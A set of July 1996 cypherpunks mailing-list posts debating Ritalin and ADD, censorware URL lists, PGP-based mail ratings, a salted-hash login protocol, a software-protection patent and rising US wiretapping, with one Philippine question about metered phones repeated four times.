From: Alan Olsen <alano@teleport.com>
Date: Mon, 8 Jul 1996 07:18:56 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960707194409.00f12000@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 7/7/96 -0700, Timothy C. May wrote:

>(As Sandy S. also noted, Ritalin has "paradoxical" effects. (I saw Sandy's
>remark after sending off my reply to Simon.))
>
>I've _seen_ the kid on Ritalin, and he's zombie. When it wears off, he's
>back to being alert and active.

Stimulants tend to have an odd effect on children.  Instead of making them
more active, they tend to do just the opposite.  (My daughter used to have
that problem with caffiene.  Used to put her to sleep.)

This makes the situation even more scary, considering how little is known
about the brain chemistry of growing children.  I am expecting the long term
effects of these drugs will be "interesting".  (And not in a good way.)  I
know a woman who was tranq'ed as a kid.  She is nice and sweet, cannot dream
at all, and is a total and unrepentant sociopath.  Your results may vary.  

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 8 Jul 1996 04:08:32 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.91.960707091156.13459A-100000@tipper.oit.unc.edu>
Message-ID: <v03007607ae0590e3c1e9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM -0400 7/7/96, Sandy Sandfort wrote:
> > Er... Tim... Ritalin is an amphetamine.
>
> Yes, normally, but doesn't it have a paradoxical reaction for
> hyperactive children (i.e., it acts as a depressant for them)?

Yes. And for some of *them*, it makes them monomaniacal SOBs. ;-). I get
more work done with Ritalin, but I'm *much* nicer without it. I've decided
to live with ADD rather than treat it, which is what most people (including
"Dr. ADD", Richard(?) Hallowell) do. Jolt cola is also popular. :-).

Like a lot of pop-psychopharmacology, "syndromes" frequently get defined by
whether the right drug has the desired effect. If prozac works, you're
depressed, if Ritalin does, you're an ADDer, and so on. By Tim's anecdotal
evidence, the little hellion (hey, *I* was one...) must be ADD because
Ritalin works.

You can actually see ADD with a PET scan, but the proper way to get a
diagnosis of ADD is to get tested for it, which, in the case of ADD, is an
expensive man-day or two with with some clinical shrink in your face, and a
bunch of frustrating (if you're ADD) tests of your attention and ability to
focus in the presence of a lot of distractions. Oddly enough, *another*
pop-psychologist from Harvard was on "20/20" this week talking about
"emotional" intellegence, and one of the determinants was inability to
understand delayed gratification. Like most kids with ADD, I must have been
a drooling idiot, in that case.

However, I practically agree with Tim on all of his screed. (A good one, I
might add. He probably only reread it once for punctuation and spelling
before he did a command-e to send it on its way. After wiping the foam
from his mouth, that is. ;-)) It seems to me that the very *last* person to
be allowed to diagnose ADD is some crypto-socialist, fucking-statist,
control-freak, industrial-mode, human-warehouse-zookeeping "educator". The
humorous irony of all this is, of course, that my wife is a senior
education bureaucrat for the People's Republic of Massachusetts. An "equal
time" marriage indeed. And *she* pays the health insurance, because I
couldn't keep a *steady* job if my life depended on it. (A compensatory
mechanism?) Well, maybe if my *life* depended on it. That *might* get my
attention.


BarelyObCrypto: ADD is more about lack of attention *control* than lack of
attention itself. Hyperfocus is also a trait of ADHD, and computers tend to
cause hyperfocus for a lot of ADDers. How many easily distracted knee-jiggling
wunderkind hackers do *you* know? Care to guess how many ADDers there are
on cypherpunks?


Wiping foam from *my* mouth,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws', 
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Mon, 8 Jul 1996 07:09:40 +0800
To: Sandy Sandfort <ses@tipper.oit.unc.edu>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <1.5.4.16.19960707191849.330f2470@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07.25 AM 7/7/96 -0700, Sandy Sandfort wrote:

>On Sun, 7 Jul 1996, Simon Spero wrote:

>> Er... Tim... Ritalin is an amphetamine. 
>
>Yes, normally, but doesn't it have a paradoxical reaction for
>hyperactive children (i.e., it acts as a depressant for them)?

Yes.

I once had a friend who took it, and it calmed him down, but after
I had known him for a few years, it began to have the opposite effect;
and "they" decided he didn't need it anymore.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok. -------------- If it's not PGP-signed, I didn't write it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMeAJxhguzHDTdpL5AQGuPAP/T8aBKGwnNSEjv0VW/Kn8+lYgkRPxEB39
1zKPxuAzwfF+dnPpTKp5R5kdGHtv/KvRGhKRQt0V+ocUdAFHVIhI2AghxunUIPjv
9hLbzJx635LwUuHQBAONdV4tzTC6D5MqH+V5WqOWgPWe1Oqa8bHrSiDVdBX31M4P
N7T2cii/s3E=
=ebXI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 9 Jul 1996 17:52:14 +0800
To: "'cypherpunks@toad.com>
Subject: Metered Phone
Message-ID: <01BB6DA5.6DF00AE0@ip137.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any ideas about this metered phone? I am from Philippines and heard some news that it will be existing in 1997. Quite a big problem! Every dial will be counted, every seconds will be measured...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 9 Jul 1996 18:17:01 +0800
To: "'cypherpunks@toad.com>
Subject: Metered Phone
Message-ID: <01BB6DA7.D17CBE80@ip75.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any ideas about this metered phone? I am from Philippines and heard some news that it will be existing in 1997. Quite a big problem! Every dial will be counted, every seconds will be measured...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 9 Jul 1996 18:20:57 +0800
To: "'cypherpunks@toad.com>
Subject: Metered Phone
Message-ID: <01BB6DA6.38C8C0E0@Jerome Tan>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any ideas about this metered phone? I am from Philippines and heard some news that it will be existing in 1997. Quite a big problem! Every dial will be counted, every seconds will be measured...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 9 Jul 1996 18:40:30 +0800
To: "'cypherpunks@toad.com>
Subject: Metered Phone
Message-ID: <01BB6DA7.33F3C3C0@ip75.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any ideas about this metered phone? I am from Philippines and heard some news that it will be existing in 1997. Quite a big problem! Every dial will be counted, every seconds will be measured...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 9 Jul 1996 18:41:29 +0800
To: "'cypherpunks@toad.com>
Subject: Metered Phone
Message-ID: <01BB6DA8.9B1FB3A0@ip75.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any ideas about this metered phone? I am from Philippines and heard some news that it will be existing in 1997. Quite a big problem! Every dial will be counted, every seconds will be measured...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 8 Jul 1996 04:13:34 +0800
To: eli+@gs160.sp.cs.cmu.edu
Subject: Re: NYT/CyberTimes on CWD article
Message-ID: <199607071744.NAA25788@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 16:56, eli+@gs160.sp.cs.cmu.edu wrote:

> >http://www.nytimes.com/library/cyber/week/0706patrol-reporters.html
> >              "If we believe the encryption scheme has
> >              been compromised, we will make another
> >              one."
[..]
> They have to give you the list, and they have to give you software
> that uses it, so there's no way to achieve complete secrecy.  I think
> the best they can do is to distribute a list of hashed URLs.

What? After they paid for the rights to use "Infinite Vigniere Key" 
Technology....

I'm surprised that they went so far as to try to encrypt the naughty 
URLs list (but some kids would get off on just reading the list alone 
anyway).

Hashing could be problematic... how to differentiate between a site 
and it's users.  www.pornopix.com is obvious, but the directory tree 
of www.localisp.com/~perv/mypix/ is harder to filter out with hashing 
if subdirectories or specific images are called up, unless the 
software has a way to differentiate between sites and specific users 
or directories on those sites.

(I wonder if the software can tell that ~perv/ and /users/home/perv/ 
or /home/perv/ can be the same directory on some systems? That would 
be an interesting flaw. Has anyone hacked with the software?)

Another problematic with Net-Nurse type software: a database of 
naughty sites and naughty users... a real goldmine for prosecutors.


Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 8 Jul 1996 04:17:35 +0800
To: bryce@digicash.com
Subject: Oh no! No ratings again... (Re: Need PGP-awareness in common uti
Message-ID: <199607071744.NAA25792@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 23:16, bryce@digicash.com wrote:

> If you have a moderation bot for a Usenet group (and could it be
> pressed into service as a mailing list handler I wonder?), this
> would be a nice tool to start with in order to implement
> full-fledged content/author ratings. [..]

Bad idea unless the list is rating authors who are not on the list.
It would be equivalent to setting up a reputation web.

Or is this a stab at humor?

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 8 Jul 1996 04:31:54 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <199607071744.NAA25785@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 23:56, bryce@digicash.com wrote:
[..]
> Hm.  That might be an interesting addition to my plan, but the 
> first step is to generate ratings and to consume them at each
> individual's mail-handling site.  So I, for example, would run a
> script every time I received mail (or every hour, or every day,
> etc) which looked for ratings certificates, PGP-verified them,
> and saved the rating in a database.  Then I would run another
> script (every time I received mail, or every hour, etc.) which
> identified incoming messages and _did_ something to them if 
> there were sufficient ratings in the database to merit _doing_
> something to them (e.g. delete, promote to a "well-rated"
> folder, demote to a "poorly-rated" folder, forward to my
> friends, forward to my enemies, etc.).

Some lists require plenty of time to read each day (let alone if I go 
on a vacation for a few days and want to catch up).  Managing a 
rating system would double the work if I were to do it by hand-rating 
the raters, etc.

It's easier to put certain people or subject threads in a twit-list 
folder and delete the rest by hand rather than put twice that effort 
into a rating system... chances are most people who quickly tire of 
maintaining it, let the rating system run on autopilot and then 
disable it when they realize they missed something really important 
or interesting.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 8 Jul 1996 07:40:07 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <ae053e0302021004289b@[205.199.118.202]>
Message-ID: <PNJPqD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> At 3:06 PM 7/7/96, Dr.Dimitri Vulis KOTM wrote:
> >Simon Spero <ses@tipper.oit.unc.edu> writes:
>
> >> Er... Tim... Ritalin is an amphetamine.
> >
> >Yes, it's an _anti-depressant, supposedly turning up those pieces of the bra
> >responsible for "tuning out" outside interference, and letting the hyperacti
> >kid concentrate.  But a true cypherpunk never lets any facts interfere with
> >political agenda.
>
> Vulis, time to put you back in my killfile. Gratuitous insults, especially
> those not based on important factual points, is your standard mode.

I don't believe you.

> (As Sandy S. also noted, Ritalin has "paradoxical" effects. (I saw Sandy's
> remark after sending off my reply to Simon.))
>
> I've _seen_ the kid on Ritalin, and he's zombie. When it wears off, he's
> back to being alert and active.

This has no cryptographic relevance, but... What about _other kids?
You have 1 kid unlucky enough to be born hyperactive (genetic predisposition
+ idiot parents) and 40 kids unlucky enough to be stuck in class with one
jerk who won't let them learn.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 8 Jul 1996 05:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960707143334_429064903@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Did I miss something?? I fisrt came here and asked something about protected
mode and was yelled at for asking it in this newsgroup. Now we're onto mind
control drugs?
uhhhhhh ok.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 8 Jul 1996 06:22:31 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607070742.AAA26296@netcom5.netcom.com>
Message-ID: <Pine.LNX.3.94.960707141928.179A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This will be my last comment on this thread.

On Sun, 7 Jul 1996, Mike Duvos wrote:

> Goodness gracious, you make these people sound almost reasonable.
> I remember last year one local TV station did a piece on "school
> phobia", and the wonderful drugs that could be used to treat it.
> The kid profiled simply didn't like school, and refused to attend
> it, and the list of symptoms given to help parents recognize the
> disorder were entirely attendance related.

Then the list of symptoms given was incorrect.  The list I got was from
_Living with Fear_ by Isaac M. Marks, M.D.

> ADD people are simply the upper 5-10% of the population with
> regard to behavioral traits which make learning more difficult.
> Of course such things can be hereditary and of course people who
> can't live up to expectations placed upon them sometimes get
> clinically depressed.
> 
> The thing to remember here is that we are looking at things which
> show continuous normal variation in any population, like height
> and hatsize, and the people who are being labeled and treated
> here are hardly some huge number of standard deviations away from
> the norm.

That still doesn't mean it isn't a disorder.  People with ADD _want_ to get
better and be able to concentrate more.  Drugs such as ritalin help them do
just this.  Dyslexia is also something that is a normal variation.  Somehow,
since it isn't psychologically related, no one would object if a drug was
discovered that could cure it and was administered to children with dyslexia.
Many people with ADD do not want to act the way they do, so it doesn't make
sense to not treat it as a disorder.

> 
>  > There are real illnesses, and there are fake ones.  Just
>  > because the psychiatic profession does attribute certain
>  > behavior to some non-existent illness doesn't mean there is
>  > any reason to not believe in any psychological maladies.
> 
> Which of course is not the issue here.  No one has stated that
> legitimate mental illness does not exist, merely that the
> profession has a tendency to use creative imagination where a
> market or political pressure exists.

Who decides which mental illnesses or disorder are legitimate?  I think both
school phobia and ADD are disorders that can be treated if the person with
the disorder is willing to be treated.  You are, of course, free to believe
that these disorders are illegitimate, but the millions of people afflicted
with these would tend to disagree.

> 
>  > It's surprising to me that people consider the Unabomber
>  > "insane" but yet do not believe that many very real mental
>  > illnesses and disorders exist.
> 
> Insanity is a legal term which by its very construction, is an
> almost impossible set of criteria to meet.  It has nothing to do
> with any scientific definition of mental illness.  You can be
> completely bonkers and carrying on meaningful conversations with
> wall ornaments, and the government will be more than happy to fry
> you in the electric chair.

People who use the term to describe people who are abnormal don't know that.
The word "sane" comes from the same root as "sanitary" which means clean or
disease-free.  Hence, insane means ill.  It is true that the legal term
"insane" is different from the scientific term "mentally ill", most people
use insane as a diminutive term for someone they believe to be abnormal.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeAExbZc+sv5siulAQHVeAQAhrXpJLpvvjGJC1eU7zckqHROBsPEmc2Y
d5f1URfKOp4bxiL48vrGqiCzX3GSEgZ8XabvPPDa4NK14mvyF6D2ReILAtfGpDOw
CG71cMZVOq8PXjJlTBN8Z4TQ0m4D+duA//eCqhJUiLgGOdznPcNY4ZOl9FWxf2gh
78d6Bbv4fjg=
=cpBT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 8 Jul 1996 06:38:46 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: SAFE Forum--some comments
In-Reply-To: <199607031912.MAA08980@netcom8.netcom.com>
Message-ID: <Pine.LNX.3.94.960707144145.179B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 3 Jul 1996, Bill Frantz wrote:

> I hear this as the server sends out a key which the client uses to encrypt
> the username/password.  This algorithm makes less sense than the one I
> thought I heard at the SAFE forum on Monday which was:

True.  That algorithm is completely useless.

> 
> (1) The server sends out a challenge/salt (different each time)
> (2) The client uses a secure hash to compute hash(salt||password) and
> returns the username and the hash.
> (3) The server computes hash(salt||password) and compares the hashes.
> 
> Given that there is still some interest in algorithms and protocols on this
> list, can you describe what is really happening?

That one makes more sense.  If the salt is completely random, then an attacker
will not be able to use a replay attack.  Since the password is hashed, there
is no way to find it out given the output.  This does require the server to
maintain a list of cleartext passwords, but that's not any worse then Kerberos
which requires a KDC store everyone's DES key.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeAGBrZc+sv5siulAQEzGwQAp6rB1eJ5DIzn9Zs5LlEDFu3K7XFRcl7S
/9MQ5ykCmvgnOqgN1Pud/KYLsZuY2x+G5W68EF0kTVfwarS2ZCT2wYVhH5cMaEQs
2YfxtoK9opB73GiMP3OJUTZlNPnwCCe/y/iHJN7HqAv/YLi+gdIc9rGXtfegE/eY
sASbbC7C1oY=
=NJSu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <tphilp@bfree.on.ca>
Date: Sun, 7 Jul 1996 06:17:56 +0800
To: cypherpunks@toad.com
Subject: Re: CCC Crypto Lock
Message-ID: <19004146800633@bfree.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


The fact that this patent was issued indicates to me that the patent office
does not understand computer technology. There is nothing new here that I
was not using for other purposes at least 20 years ago.
Unfortunately, once a patent is issued, it cost a great deal of money to break.

Tim Philp


At 04:10 AM 7/6/96 -0700, you wrote:
>MicroPatent, 4 July 96
> 
> 
>Systems and methods for protecting software from 
>unlicensed copying and use (Assignee -- Convex Computer 
>Corporation) 
> 
> 
>Abstract: Disclosed systems and methods for protecting a 
>software program from unauthorized use and copying 
>through the removal at least one of a plurality of 
>instructions comprising a software program, and 
>encrypting the removed instruction utilizing an 
>encryption algorithm to produce an encrypted instruction, 
>the encryption algorithm responsive to a randomly 
>generated key. 
> 
>Ex Claim Text: A processing system for protecting a 
>software program from unauthorized use, said software 
>program including one or more unencrypted instructions 
>stored in memory associated with said software program, 
>said processing system comprising: a processing unit 
>operable to: remove at least one selected said 
>unencrypted instruction from an executable area in said 
>memory associated with executable portions of said 
>program; encrypt said at least one selected unencrypted 
>instruction removed from said software program utilizing 
>an encryption algorithm to produce an encrypted 
>instruction; store said encrypted instruction within a 
>first non-executable data area in said memory associated 
>with said software program; and insert at least one 
>trappable instruction in place of said encrypted 
>instruction within said executable area in memory 
>allowing said software program to be linked with one or 
>more other programs. 
> 
>Assignee: Convex Computer Corporation 
> 
>Patent Number: 5530752 
> 
>Issue Date: 1996 06 25 
> 
>Inventor(s): Rubin, Robert J. 
> 
>If you would like to purchase a copy of this patent, 
>please call MicroPatent at 800-984-9800.  
> 
>Copyright 1996, MicroPatent 
> 
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Mon, 8 Jul 1996 07:03:15 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: NYT/CyberTimes on CWD article
In-Reply-To: <v01510102ae044ed3a7e6@[204.62.128.229]>
Message-ID: <31E03A02.15F4A87C@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> "We are writers, not crytographers."
> 
> -Declan

   Well done. Very well done. I'm not sure why Brock is constructing
this hard-drinking bad-boy persona (perhaps he's trying to become the
Trent Reznor of crypto journalism), but the piece was great.

   This work sends a very clear message (which is obvious to
cypherpunks, but not to the pro-censorship side): that in practice, what
exactly gets censored has a lot more to do with politics, and a lot less
to do with the original good intentions of the pro-censorship forces,
than appears on the surface. There's no reason to believe that
government-sponsored censorship would be any more carefully done than
the privately available software packages of today. In fact, there is
ample evidence to believe the contrary; these programs are subject to
the discipline of the marketplace.

   Sorry for the mini-rant. Keep up the good work.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 8 Jul 1996 08:50:22 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607071816.LAA19127@dns1.noc.best.net>
Message-ID: <kFqPqD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> writes:
>
> > > Er... Tim... Ritalin is an amphetamine.
>
> At 07:25 AM 7/7/96 -0700, Sandy Sandfort wrote:
> > Yes, normally, but doesn't it have a paradoxical reaction for
> > hyperactive children (i.e., it acts as a depressant for them)?
>
> Not really:  Ordinary college students who use it to facilitate
> cramming report that it has the same effect on them as on hyperactive
> children.
>
> A well known symptom of amphetamine abuse is that the abusers will
> cheerfully persist in pointless and boring activities for hours
> on end, such as folding paper bags or stirring long overcooked
> spaghetti.

Please don't shit on speed. One of the brightest people I know is 70+
years old. He's been eating several grams of speed a day since WW2.
He's brilliant and doesn't look a day over 40.

Disclaimer: I don't take speed - I don't need any drugs to be the way I am.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Mon, 8 Jul 1996 09:00:53 +0800
To: jya@pipeline.com (John Young)
Subject: EYE_son
Message-ID: <2.2.32.19960707074506.0069c9c0@mail1.amaonline.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 8 Jul 1996 11:53:11 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting
Message-ID: <199607080050.RAA05944@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Believe it or not, this has some very slight cypherpunk relevance.  (Gasp)

At 10:06 PM 7/7/96 -0700, Timothy C. May wrote:
> Sadly, simple expository prose must be considered to be too boring, too banal.
>
> (Actually, were only a few writers doing this, it might be mildy tolerable.
> Speaking for myself, that is. But so _many_ "cyberspace journalists" are
> doing bad pastiches of famous stylists that the reportage is being lost in
> the noise.

When news media were concentrated into fewer and fewer hands during 
the twentieth century, the appearance of neutrality, objectivity, 
and authoritativeness became a major selling point, and so media 
adopted a tone and manner of neutrality, with an accompanying 
"just-the-facts" style, though in reality they became far less neutral

Now that everyone can grab the megaphone, people are not so worried
about objectivity.  If something is unfair to Nazis or blacks or evil
polluting capitalists, they know they will hear about it from the 
Nazis, the blacks or the evil polluting capitalists.

As a result, people no longer value the superficial appearance of 
neutrality and objectivity.  Suddenly colorful and openly biased 
reporting has become popular.  

This has led to some people engaging in florid excesses of colorful 
style and concocting totally phony attitudes., just as when word 
processing programs first gained the capability to handle a wide 
variety of fonts, some people produced memos that looked like 
ransom notes.

Soon enough they will settle down.  English prose was at its greatest 
in the eighteenth and nineteenth centuries, when many voices could be 
heard, and some of them were on the florid side.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 03:42:52 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae053d5e0102100401bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 PM 7/7/96, Simon Spero wrote:
>On Sat, 6 Jul 1996, Timothy C. May wrote:
>>
>> When the mother (a single mother, as this is California) drops her son off
>> with my friend (also single, of course), she includes several "Ritalin"
>> capsules with instructions on how to dose her son with this
>> depressant/behavior modification drug.
>
>Er... Tim... Ritalin is an amphetamine.

Whatever. It acts as a calmant/tranquilizer/depressant on many.

(As with many drugs, there are apparently paradoxical effects. Alcohol is a
downer for some, and upper for others.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 03:48:04 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae053e0302021004289b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:06 PM 7/7/96, Dr.Dimitri Vulis KOTM wrote:
>Simon Spero <ses@tipper.oit.unc.edu> writes:

>> Er... Tim... Ritalin is an amphetamine.
>
>Yes, it's an _anti-depressant, supposedly turning up those pieces of the brain
>responsible for "tuning out" outside interference, and letting the hyperactive
>kid concentrate.  But a true cypherpunk never lets any facts interfere with his
>political agenda.

Vulis, time to put you back in my killfile. Gratuitous insults, especially
those not based on important factual points, is your standard mode.

(As Sandy S. also noted, Ritalin has "paradoxical" effects. (I saw Sandy's
remark after sending off my reply to Simon.))

I've _seen_ the kid on Ritalin, and he's zombie. When it wears off, he's
back to being alert and active.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 8 Jul 1996 05:13:36 +0800
To: cypherpunks@toad.com
Subject: Wiretapping Rises EYE_son
Message-ID: <199607071830.SAA23675@pipe4.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Wash Post today has page one lead story on the sharp rise in
wiretapping by the Clinton administration. Former restraints due to high
cost have been overcome with more money and more efficeint technology,
eagerly supported by a bipartisan Congress and grateful LEA and DoJ
cartelest conspiracists. 
 
 
And, there is a lengthy Op-Ed on the "growing stealth slice of the
shrinking defense pie." 
 
 
Lots and lots of secrets, can't get enough of them, can't tell the public
what they are, about real and imaginary terrorists and anti-terrorists --
and bypass the private citizens that threaten budgets and jobs and inner
sanctum privileges. 
 
 
